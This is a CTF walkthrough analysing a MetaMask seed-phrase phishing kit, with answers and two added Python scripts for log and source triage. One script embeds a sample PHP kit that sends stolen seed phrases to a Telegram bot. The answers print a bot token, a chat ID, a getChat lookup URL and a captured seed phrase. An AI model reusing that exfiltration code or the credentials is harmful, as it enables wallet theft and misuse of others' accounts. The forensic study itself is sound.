CyberDefenders - GrabThePhisher CTF
Intro
We were challenged to complete this mini CTF about a coin-stealer and phishing kit. It wasn't as exciting as tracking coin transactions, but forensic and coding skills are all that are required to defeat this mini-challenge. GrabThePhisher CTF
Walkthrough
1) Which wallet is used for asking the seed phrase?
Hint:
- Find the source
Answer
metamask
2) What is the file name that has the code for the phishing kit?
Answer
metamask.php
3) In which language was the kit written?
Answer
php
4) What service does the kit use to retrieve the victim’s machine information?
Hint:
- First few lines
- The API source can be found on GitHub
Answer
sypex geo
5) How many seed phrases were already collected?
Hint:
- Locate a log file
Answer
3
6) Write down the seed phrase of the most recent phishing incident.
Answer
father also recycle embody balance concert mechanic believe owner pair muffin hockey
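Questions 5 and 6 come down to parsing the kit's victim log: counting how many seed phrases were captured and picking the most recent one. The script below is an added example for this write-up, not part of the CTF artifacts; the log format (timestamp, source IP, wallet, seed phrase, pipe-separated) and every line in SAMPLE_LOG are constructed. It filters out malformed lines and entries whose word count cannot be a BIP-39 mnemonic, picks "most recent" by timestamp rather than by file position, and offers a redacted form so the phrases do not end up verbatim in a report.

```python
"""Triage a phishing-kit victim log: count captured seed phrases and find the
most recent one. Log format and sample content are constructed for this
write-up; they are not the CTF's own log file."""
import re
from dataclasses import dataclass
from datetime import datetime

# Constructed sample log. One entry per victim:
# <ISO timestamp> | <source IP> | <wallet> | <seed phrase>
# Lines are deliberately out of chronological order and one is junk.
SAMPLE_LOG = """\
2022-05-10 14:02:11 | 203.0.113.10 | metamask | apple banana cherry delta echo fox golf hotel india juliet kilo lima
junk line that should be ignored
2022-05-11 08:45:03 | 198.51.100.7 | metamask | alpha bravo charlie delta echo foxtrot golf hotel india juliet kilo lima
2022-05-12 01:00:00 | 203.0.113.20 | metamask | not a real seed phrase
2022-05-09 23:59:59 | 192.0.2.55 | metamask | zulu yankee xray whiskey victor uniform tango sierra romeo quebec papa oscar
"""

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) \| (?P<ip>[\d.]+) \| "
    r"(?P<wallet>\w+) \| (?P<phrase>[a-z]+(?: [a-z]+)*)$"
)
VALID_WORD_COUNTS = {12, 15, 18, 21, 24}  # lengths a BIP-39 mnemonic can have


@dataclass
class Capture:
    timestamp: datetime
    ip: str
    wallet: str
    phrase: str

    @property
    def looks_like_mnemonic(self) -> bool:
        return len(self.phrase.split()) in VALID_WORD_COUNTS


def parse_log(text: str) -> list:
    """Return one Capture per well-formed line; unrelated lines are skipped."""
    captures = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # malformed or unrelated line
        captures.append(Capture(datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S"),
                                m["ip"], m["wallet"], m["phrase"]))
    return captures


def count_seed_phrases(captures) -> int:
    """Question 5: only entries with a plausible mnemonic length count."""
    return sum(1 for c in captures if c.looks_like_mnemonic)


def most_recent(captures):
    """Question 6: newest by timestamp, not by position in the file."""
    valid = [c for c in captures if c.looks_like_mnemonic]
    return max(valid, key=lambda c: c.timestamp) if valid else None


def redact(phrase: str) -> str:
    """Report-safe form: first word plus word count, never the full phrase."""
    words = phrase.split()
    return f"{words[0]} ... ({len(words)} words)"


if __name__ == "__main__":
    caps = parse_log(SAMPLE_LOG)
    print("captured seed phrases:", count_seed_phrases(caps))
    newest = most_recent(caps)
    print("most recent:", newest.timestamp, newest.ip, redact(newest.phrase))
```

Run it as a script to see the summary, or point `parse_log` at the real log's contents once you have adapted LINE_RE to the kit's actual format.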
7) Which medium had been used for credential dumping?
Answer
telegram
8) What is the token for the channel?
Answer
5457463144:AAG8t4k7e2ew3tTi0IBShcWbSia0Irvxm10
9) What is the chat ID of the phisher’s channel?
Answer
5442785564
10) What are the allies of the phish kit developer?
Answer
j1j1b1s@m3r0
11) What is the full name of the Phish Actor?
Hint:
- Access the Telegram chat room
- get-channel-or-group-info-using-telegram-api
- https://api.telegram.org/bot5457463144:AAG8t4k7e2ew3tTi0IBShcWbSia0Irvxm10/getChat?chat_id=5442785564
Answer
Marcus Aurelius
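Questions 4 and 7 through 11 are all answered by static triage of the kit's PHP source: which helper library it includes, where it sends the stolen data, and the bot token and chat ID that let an analyst query Telegram's getChat method for the channel owner's details. The script below is an added example for this write-up, not the kit's own code; SAMPLE_KIT_SOURCE, its placeholder token and chat ID, and the file names in it are all constructed. It extracts the indicators with regular expressions, builds the getChat lookup URL without calling it, and redacts the token for reporting.

```python
"""Static triage of a phishing-kit PHP source: included helper files, Telegram
exfiltration credentials, local log files, and the API URL an analyst would
query. The PHP below is a constructed sample, not the CTF's metamask.php."""
import re

# Constructed sample kit source. The token and chat id are placeholders.
SAMPLE_KIT_SOURCE = r'''<?php
include 'SxGeo.php';
$SxGeo = new SxGeo('SxGeoCity.dat');
$ip    = $_SERVER['REMOTE_ADDR'];
$city  = $SxGeo->getCityFull($ip);
$token   = "1234567890:AAHconstructedtoken_for_demo_only00";
$chat_id = "1000000001";
$msg = "Seed: " . $_POST['seed'] . " IP: " . $ip;
file_get_contents("https://api.telegram.org/bot$token/sendMessage?chat_id=$chat_id&text=" . urlencode($msg));
file_put_contents("log.txt", $msg . PHP_EOL, FILE_APPEND);
'''

# include/require of a helper file, e.g. the Sypex Geo library
INCLUDE_RE = re.compile(r"\b(?:include|require)(?:_once)?\s*\(?\s*['\"]([^'\"]+)['\"]")
# Telegram bot token shape: numeric bot id, colon, 35-char secret
TOKEN_RE = re.compile(r"\b(\d{8,10}:[A-Za-z0-9_-]{35})\b")
# chat id assigned as a literal; group/channel ids can be negative
CHAT_ID_RE = re.compile(r"chat_id\s*=\s*['\"]?(-?\d{6,})")
# local files the kit appends captures to
LOGFILE_RE = re.compile(r"file_put_contents\(\s*['\"]([^'\"]+)['\"]")


def find_includes(src: str) -> list:
    return INCLUDE_RE.findall(src)


def find_bot_tokens(src: str) -> list:
    return sorted(set(TOKEN_RE.findall(src)))


def find_chat_ids(src: str) -> list:
    return sorted(set(CHAT_ID_RE.findall(src)))


def find_log_files(src: str) -> list:
    return LOGFILE_RE.findall(src)


def redact_token(token: str) -> str:
    """Keep the bot id and last four secret chars so reports stay correlatable."""
    bot_id, secret = token.split(":", 1)
    return f"{bot_id}:{'*' * (len(secret) - 4)}{secret[-4:]}"


def getchat_url(token: str, chat_id: str) -> str:
    """Bot API getChat endpoint; it returns the chat's name and username."""
    return f"https://api.telegram.org/bot{token}/getChat?chat_id={chat_id}"


def triage(src: str) -> dict:
    """Collect everything the walkthrough questions ask for in one pass."""
    tokens = find_bot_tokens(src)
    chat_ids = find_chat_ids(src)
    return {
        "includes": find_includes(src),
        "tokens_redacted": [redact_token(t) for t in tokens],
        "chat_ids": chat_ids,
        "log_files": find_log_files(src),
        "lookup_urls": [getchat_url(t, c) for t in tokens for c in chat_ids],
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_KIT_SOURCE).items():
        print(f"{key}: {value}")
```

Feed the real metamask.php contents to `triage` and paste the resulting lookup URL into a browser, as the hint above suggests, to read the channel's first name, last name and username from the JSON response.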
12) What is the username of the Phish Actor?
Answer
pumpkinboii